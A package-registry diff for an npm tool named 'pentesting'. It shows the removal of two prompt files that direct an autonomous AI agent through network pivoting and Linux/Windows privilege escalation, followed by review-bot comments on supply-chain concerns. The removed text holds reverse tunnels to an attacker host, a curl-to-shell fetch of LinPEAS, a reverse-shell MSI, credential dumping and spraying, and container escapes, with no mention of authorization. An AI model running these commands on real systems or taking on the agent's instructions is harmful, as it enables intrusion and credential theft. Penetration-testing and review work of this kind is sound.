pentesting 0.73.14 → 0.90.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70)
  1. package/README.md +119 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,205 +0,0 @@
1
- # Pivoting & Multi-Hop Tunneling — Autonomous Guide
2
-
3
- > **Cross-ref**: lateral.md (movement), ad-attack.md (AD pivoting), network-svc.md (internal services)
4
-
5
- ## Core Principle
6
-
7
- Pivoting = using a compromised host as a relay to reach previously unreachable network segments.
8
- The agent on the **outer host** can only reach the **inner network** through a pivot chain.
9
-
10
- ---
11
-
12
- ## Pivot Decision Tree
13
-
14
- ```
15
- GOT SHELL ON HOST? → Run immediately:
16
- ip a / ifconfig → list interfaces (look for 2+ NICs = pivot candidate)
17
- ip route / route -n → routing table (internal subnets)
18
- arp -a → visible hosts (discovered via ARP)
19
- cat /etc/hosts → hardcoded internal names
20
- netstat -an → internal listening services
21
- ss -tlnp → listening ports (Linux)
22
-
23
- FOUND INTERNAL SUBNET (e.g. 10.10.100.0/24)?
24
- → Port scan via pivot: nmap through socks proxy or chisel
25
- → Identify services → exploit from outer agent via tunnel
26
-
27
- FOUND INTERNAL HOST NAMES?
28
- → DNS resolution from pivot: dig @internal-DNS hostname
29
- → Look for: DC, DB, git, admin, intranet, mail
30
- ```
31
-
32
- ---
33
-
34
- ## Method 1: SSH Tunneling (if SSH available on pivot)
35
-
36
- ```
37
- LOCAL PORT FORWARD — access pivot's localhost from attacker:
38
- ssh -L 8080:127.0.0.1:80 user@PIVOT
39
- → Now: http://localhost:8080 = http://PIVOT:80
40
-
41
- REMOTE PORT FORWARD — expose attacker port through pivot:
42
- ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT
43
- → From PIVOT: nc attacker 4444 reaches attacker's local 4444
44
-
45
- DYNAMIC SOCKS PROXY — route arbitrary traffic through pivot:
46
- ssh -D 1080 user@PIVOT
47
- → proxychains / nmap --proxies socks4://127.0.0.1:1080 INTERNAL_TARGET
48
-
49
- MULTI-HOP (3 hops):
50
- ssh -J user@HOP1,user@HOP2 user@FINAL_TARGET
51
- ssh -L 8080:INTERNAL:80 -J user@HOP1 user@HOP2
52
- ```
53
-
54
- ---
55
-
56
- ## Method 2: Chisel (No SSH Required — TCP over HTTP)
57
-
58
- ```
59
- ATTACKER SIDE (server):
60
- chisel server --port 8080 --reverse
61
-
62
- PIVOT SIDE (client — upload chisel binary):
63
- chisel client ATTACKER:8080 R:socks → SOCKS5 on attacker:1080
64
- chisel client ATTACKER:8080 R:4444:10.10.100.5:22 → forward specific port
65
-
66
- MULTI-HOP chisel:
67
- HOP1 connects to attacker → SOCKS on attacker:1080
68
- HOP2 connects to HOP1 via proxychains → SOCKS chain
69
-
70
- USAGE with proxychains:
71
- echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
72
- proxychains nmap -sT -Pn -p 22,80,443,445,3389 10.10.100.0/24
73
- proxychains evil-winrm -i 10.10.100.5 -u admin -p pass
74
- ```
75
-
76
- ---
77
-
78
- ## Method 3: Ligolo-ng (Kernel TUN — fastest, cleanest)
79
-
80
- ```
81
- ATTACKER (proxy):
82
- sudo ip tuntap add user $USER mode tun ligolo
83
- sudo ip link set ligolo up
84
- ./proxy -selfcert
85
-
86
- PIVOT (agent — upload binary):
87
- ./agent -connect ATTACKER:11601 -ignore-cert
88
-
89
- ATTACKER — after agent connects:
90
- session → select agent
91
- listener_add --addr 0.0.0.0:1234 --to 10.10.100.5:22 → port forward
92
- start → add route: sudo ip route add 10.10.100.0/24 dev ligolo
93
- → Now: ssh admin@10.10.100.5 directly (no proxychains!)
94
-
95
- MULTI-HOP with ligolo:
96
- Agent on HOP1 → reach HOP2 network
97
- Upload agent to HOP2 → connect through ligolo listener on HOP1
98
- web_search("ligolo-ng double pivot setup multi-hop")
99
- ```
100
-
101
- ---
102
-
103
- ## Method 4: Metasploit Route / SOCKS
104
-
105
- ```
106
- meterpreter session on pivot:
107
- background
108
- use post/multi/manage/autoroute
109
- set SESSION 1 → run
110
-
111
- Then:
112
- use auxiliary/server/socks_proxy → set VERSION 5 → run
113
- → proxychains through Metasploit SOCKS on 127.0.0.1:1080
114
-
115
- portfwd in meterpreter:
116
- portfwd add -l 3389 -p 3389 -r INTERNAL_HOST
117
- → rdesktop localhost:3389
118
- ```
119
-
120
- ---
121
-
122
- ## Method 5: Netcat / Socat Relay (No binary upload — abuse existing tools)
123
-
124
- ```
125
- NETCAT RELAY (if mkfifo available):
126
- mkfifo /tmp/pipe
127
- nc -l -p 4444 < /tmp/pipe | nc INTERNAL_TARGET 22 > /tmp/pipe
128
-
129
- SOCAT RELAY:
130
- socat TCP-LISTEN:4444,fork TCP:INTERNAL_TARGET:22
131
- → Persistent relay: socat TCP-LISTEN:4444,fork,reuseaddr TCP:TARGET:22
132
-
133
- SOCAT SOCKS PROXY (if socat version supports it):
134
- socat TCP-LISTEN:1080,fork SOCKS4A:localhost:INTERNAL_HOST:PORT,socksport=1080
135
- ```
136
-
137
- ---
138
-
139
- ## Internal Network Scanning via Pivot
140
-
141
- ```
142
- VIA PROXYCHAINS (any pivot method):
143
- proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389,5985,6379,8080 INTERNAL/24
144
- proxychains nmap -sT -Pn --top-ports 100 INTERNAL/24
145
-
146
- BASH PING SWEEP (when no tools):
147
- for i in $(seq 1 254); do ping -c1 -W1 10.10.100.$i &>/dev/null && echo "10.10.100.$i UP"; done
148
-
149
- BASH PORT SCAN (when no tools):
150
- for port in 22 80 443 445 3389 5985; do
151
- (echo >/dev/tcp/10.10.100.5/$port) 2>/dev/null && echo "$port OPEN"
152
- done
153
- ```
154
-
155
- ---
156
-
157
- ## Reverse Shell Through Pivot
158
-
159
- ```
160
- DOUBLE PIVOT — get shell from deep internal host back to outside:
161
-
162
- Method A: Chisel reverse
163
- Outer SOCKS → proxychains + outer listener
164
- Inner host connects outbound (if egress allowed):
165
- chisel client ATTACKER:8080 R:4445:127.0.0.1:4445
166
-
167
- Method B: Meterpreter bind shell
168
- proxychains exploit/multi/handler (PAYLOAD: bind_tcp on INTERNAL_HOST)
169
- lhost=INTERNAL_HOST → proxychains connect inbound
170
-
171
- Method C: SSH -R through existing session
172
- From inner host: ssh -R 9001:127.0.0.1:9001 pivot_user@PIVOT
173
- From attacker: nc PIVOT:9001
174
-
175
- Reverse shell via proxy (if internal host has egress):
176
- → Set attacker IP as destination (should reach PIVOT, then routed back)
177
- → Verify connectivity: proxychains curl http://ATTACKER:8080/test
178
- ```
179
-
180
- ---
181
-
182
- ## Credential Spray Across Pivoted Networks
183
-
184
- ```
185
- Once you have credentials from the outer network → always spray internally:
186
- proxychains crackmapexec smb 10.10.100.0/24 -u user -p pass --continue-on-success
187
- proxychains crackmapexec winrm 10.10.100.0/24 -u user -p pass
188
- proxychains impacket-psexec DOMAIN/user:pass@INTERNAL_HOST
189
-
190
- Credential relay internally:
191
- proxychains impacket-ntlmrelayx -t INTERNAL_TARGET -smb2support
192
- Coerce auth from pivot: PetitPotam, PrinterBug, MS-RPRN
193
- ```
194
-
195
- ---
196
-
197
- ## Search Patterns
198
-
199
- ```
200
- web_search("chisel multi-hop pivot {year}")
201
- web_search("ligolo-ng double pivot internal network")
202
- web_search("proxychains nmap internal network scanning")
203
- web_search("pivot {OS} tunneling no binary upload")
204
- web_search("reverse shell through pivot NAT traversal")
205
- ```
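Review bot: this hunk deletes package/dist/prompts/techniques/pivoting.md in full (`@@ -1,205 +0,0 @@`, matching the `+0 -205` entry in the file list) and nothing in the 70-file list adds a replacement prompt; the only additions are package/bin/pentesting.mjs, package/lib/runtime.mjs, package/scripts/postinstall.mjs and package/scripts/preflight-local.sh. If the technique prompts are now generated or fetched by runtime.mjs at install or run time, please state that in the README change and pin what is fetched (a version and a content hash), because the published tarball no longer lets a consumer audit the instructions the agent will act on. The removed text also mixed runnable commands with `web_search(...)` tool-call placeholders inside one untagged fence (e.g. `web_search("ligolo-ng double pivot setup multi-hop")` under `MULTI-HOP with ligolo:`); wherever this content is re-homed, keep the two separated so a placeholder is never emitted as a shell command.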
@@ -1,190 +0,0 @@
1
- # Privilege Escalation — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: shells.md (shell access), post.md (post-exploitation), lateral.md (lateral movement)
8
-
9
- ## Core Principle
10
- Initial access is usually low-privileged. Privesc is MANDATORY.
11
- There are hundreds of privesc vectors — automated tools + manual checks + SEARCH.
12
-
13
- ## 🐧 Linux Privilege Escalation
14
-
15
- ### Automated Enumeration (RUN FIRST)
16
- ```
17
- ALWAYS run automated enumeration:
18
- ├── LinPEAS: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
19
- ├── LinEnum: web_search("linenum github") → download and run
20
- ├── linux-exploit-suggester: web_search("linux exploit suggester github")
21
- ├── pspy: monitor processes without root (cron jobs, other users' commands)
22
- └── If tools can't be transferred: run commands manually (see below)
23
- ```
24
-
25
- ### Manual Privesc Vector Map
26
- ```
27
- LINUX PRIVESC CATEGORIES:
28
-
29
- ├── 1. Kernel Exploits
30
- │ ├── uname -a → kernel version
31
- │ ├── web_search("linux kernel {version} privilege escalation exploit")
32
- │ ├── searchsploit linux kernel {version}
33
- │ └── Dirty COW, Dirty Pipe, OverlayFS, etc.
34
-
35
- ├── 2. SUID/SGID Binaries
36
- │ ├── find / -perm -4000 -type f 2>/dev/null (SUID)
37
- │ ├── find / -perm -2000 -type f 2>/dev/null (SGID)
38
- │ ├── For EACH found binary: check GTFOBins
39
- │ │ web_search("{binary_name} gtfobins")
40
- │ ├── Custom SUID binaries: strings, ltrace, strace → find vulnerability
41
- │ └── Known exploitable SUID: nmap, vim, python, find, bash, cp, mv, etc.
42
-
43
- ├── 3. Sudo Misconfiguration
44
- │ ├── sudo -l (list what current user can sudo)
45
- │ ├── (ALL, !root) → CVE-2019-14287: sudo -u#-1 /bin/bash
46
- │ ├── NOPASSWD entries → check GTFOBins for each allowed command
47
- │ ├── sudo version: sudo --version → web_search("sudo {version} CVE")
48
- │ ├── LD_PRELOAD/LD_LIBRARY_PATH in env_keep → shared library injection
49
- │ └── web_search("sudo {command} privilege escalation gtfobins")
50
-
51
- ├── 4. Cron Jobs
52
- │ ├── cat /etc/crontab, ls -la /etc/cron.*, crontab -l
53
- │ ├── Writable cron scripts → replace with reverse shell
54
- │ ├── Wildcard injection: if cron uses * → inject flag files
55
- │ │ tar: --checkpoint + --checkpoint-action=exec=sh
56
- │ │ rsync: -e "sh shell.sh"
57
- │ ├── PATH exploitation: cron PATH writable → place malicious binary first
58
- │ └── pspy to discover hidden cron jobs and service activity
59
-
60
- ├── 5. Capabilities
61
- │ ├── getcap -r / 2>/dev/null
62
- │ ├── Exploitable: cap_setuid, cap_dac_override, cap_sys_admin, cap_net_raw
63
- │ ├── Python with cap_setuid: python -c 'import os; os.setuid(0); os.system("/bin/bash")'
64
- │ └── web_search("{binary} {capability} privilege escalation")
65
-
66
- ├── 6. Writable Files/Directories
67
- │ ├── /etc/passwd writable → add root user (openssl passwd -1 -salt xyz password)
68
- │ ├── /etc/shadow readable → crack hashes (hashcat/john)
69
- │ ├── .bashrc/.profile of other users → inject commands
70
- │ ├── Service config files → modify service to run as root
71
- │ ├── init scripts/systemd services writable → modify ExecStart
72
- │ └── find / -writable -type f 2>/dev/null | grep -v proc
73
-
74
- ├── 7. Path Hijacking
75
- │ ├── echo $PATH → are writable dirs BEFORE system dirs?
76
- │ ├── Service/script calls command without absolute path → create in writable dir
77
- │ ├── LD_LIBRARY_PATH → shared library hijacking
78
- │ └── Python library path → create malicious module with same name
79
-
80
- ├── 8. NFS Misconfiguration
81
- │ ├── cat /etc/exports → look for no_root_squash
82
- │ ├── Mount from attacker → create SUID binary → execute on target
83
- │ └── Web_search("NFS no_root_squash privilege escalation")
84
-
85
- ├── 9. Docker/Container Escape
86
- │ ├── In docker group? → docker run -v /:/mnt --rm -it alpine chroot /mnt sh
87
- │ ├── Privileged container? → mount /dev/sda1 /mnt → access host filesystem
88
- │ ├── Docker socket mounted? → full host access
89
- │ ├── cap_sys_admin → mount cgroup + notify_on_release → execute on host
90
- │ └── web_search("docker container escape privilege escalation {year}")
91
-
92
- ├── 10. Sensitive Information
93
- │ ├── grep -r "password" /var/www/ /opt/ /home/ /etc/ 2>/dev/null
94
- │ ├── .env files, config files, database connection strings
95
- │ ├── .bash_history, .mysql_history, .sh_history
96
- │ ├── SSH keys: find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
97
- │ ├── Stored credentials: /var/www/html/wp-config.php, .git/config
98
- │ └── Internal services with credentials → pivot to higher-priv user
99
-
100
- └── 11. Miscellaneous
101
- ├── Shared library injection via writable .so files
102
- ├── AppArmor/SELinux misconfiguration → bypass
103
- ├── dbus exploitation
104
- ├── Polkit vulnerabilities (CVE-2021-4034 pkexec, CVE-2021-3560)
105
- └── web_search("linux privilege escalation {year} new techniques")
106
- ```
107
-
108
- ## 🪟 Windows Privilege Escalation
109
-
110
- ### Automated Enumeration
111
- ```
112
- ├── WinPEAS: upload and run (or run from memory via PowerShell)
113
- ├── PowerUp.ps1: Invoke-AllChecks
114
- ├── Seatbelt.exe: comprehensive security enumeration
115
- ├── SharpUp.exe: check for common privesc vectors
116
- └── windows-exploit-suggester: compare systeminfo output
117
- ```
118
-
119
- ### Manual Privesc Vector Map
120
- ```
121
- WINDOWS PRIVESC CATEGORIES:
122
-
123
- ├── 1. Kernel Exploits
124
- │ ├── systeminfo → OS version + patch level
125
- │ ├── web_search("windows {version} {build} privilege escalation exploit")
126
- │ ├── windows-exploit-suggester --update --systeminfo sysinfo.txt
127
- │ └── Notable: PrintNightmare, HiveNightmare, EternalBlue, JuicyPotato, etc.
128
-
129
- ├── 2. Service Exploits
130
- │ ├── Unquoted service paths: wmic service get name,pathname | findstr /i "C:"
131
- │ ├── Weak service permissions: sc qc <service>, accesschk.exe
132
- │ ├── Service binary replacement: replace binary of service running as SYSTEM
133
- │ ├── DLL Hijacking: missing DLL → place malicious DLL in search path
134
- │ └── Registry permissions: writable service registry keys
135
-
136
- ├── 3. Token Impersonation
137
- │ ├── SeImpersonatePrivilege → JuicyPotato/PrintSpoofer/GodPotato
138
- │ ├── SeAssignPrimaryTokenPrivilege → token manipulation
139
- │ ├── whoami /priv → check all privileges
140
- │ └── web_search("windows token impersonation SeImpersonate exploit {year}")
141
-
142
- ├── 4. AlwaysInstallElevated
143
- │ ├── Check: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
144
- │ ├── If enabled → create malicious .msi → runs as SYSTEM
145
- │ └── msfvenom -p windows/shell_reverse_tcp ... -f msi > evil.msi
146
-
147
- ├── 5. Stored Credentials
148
- │ ├── cmdkey /list → stored credentials
149
- │ ├── runas /savecred /user:admin "cmd /c reverse_shell.exe"
150
- │ ├── SAM/SYSTEM backup files → dump hashes
151
- │ ├── LSASS dump: mimikatz, Task Manager, procdump
152
- │ ├── Registry: reg save HKLM\SAM sam, reg save HKLM\SYSTEM system
153
- │ ├── Credential Manager, DPAPI protected blobs
154
- │ └── web_search("windows credential extraction techniques {year}")
155
-
156
- ├── 6. Scheduled Tasks
157
- │ ├── schtasks /query /fo LIST /v
158
- │ ├── Writable task scripts → replace with malicious code
159
- │ ├── Writable task binary paths → replace binary
160
- │ └── Missing binaries → create malicious binary at expected path
161
-
162
- ├── 7. Registry Exploits
163
- │ ├── AutoRun: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
164
- │ ├── Writable registry keys → modify
165
- │ └── AppInit_DLLs, Image File Execution Options
166
-
167
- ├── 8. UAC Bypass
168
- │ ├── web_search("UAC bypass technique {year}")
169
- │ ├── fodhelper.exe bypass, eventvwr.exe bypass
170
- │ ├── DLL side-loading in auto-elevated processes
171
- │ └── UACME github → comprehensive UAC bypass collection
172
-
173
- └── 9. Miscellaneous
174
- ├── AMSI bypass → web_search("AMSI bypass {year}")
175
- ├── AppLocker bypass → web_search("AppLocker bypass {year}")
176
- ├── Network credential sniffing (Responder, Inveigh)
177
- ├── Clipboard monitoring for passwords
178
- └── web_search("windows privilege escalation {year} new techniques")
179
- ```
180
-
181
- ## Universal Privesc Search Pattern
182
- ```
183
- 1. What OS/version? → web_search("{OS} {version} privilege escalation")
184
- 2. What services? → web_search("{service} privilege escalation")
185
- 3. What binaries? → web_search("{binary} gtfobins") OR web_search("{binary} lolbas")
186
- 4. What's misconfigured? → interpret LinPEAS/WinPEAS output
187
- 5. What's writable? → modify writable files/services for shell execution
188
- 6. What credentials? → crack, spray, or reuse found credentials
189
- 7. Still stuck? → web_search("{kernel_version} exploit CVE PoC")
190
- ```
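Review bot: the whole of privesc.md goes away here (`@@ -1,190 +0,0 @@`) together with its `§3 Minimal Specification` header, which told the agent not to work through the list linearly but to decide from `get_owasp_knowledge`, `web_search` and target observations; if this prompt now lives outside the tarball, that governing caveat has to travel with it and the README should say where it went. Separately, the removed file led its Linux section with `curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh`, i.e. unpinned execution of whatever the `latest` release serves; whatever replaces this content should pin a release and check a hash before anything is piped to a shell. Since the file list shows `package/scripts/postinstall.mjs +30 -0` as new, the README should also document what that hook does and whether `npm install --ignore-scripts` leaves the package usable, as a postinstall hook is the first thing consumers of this diff will look at.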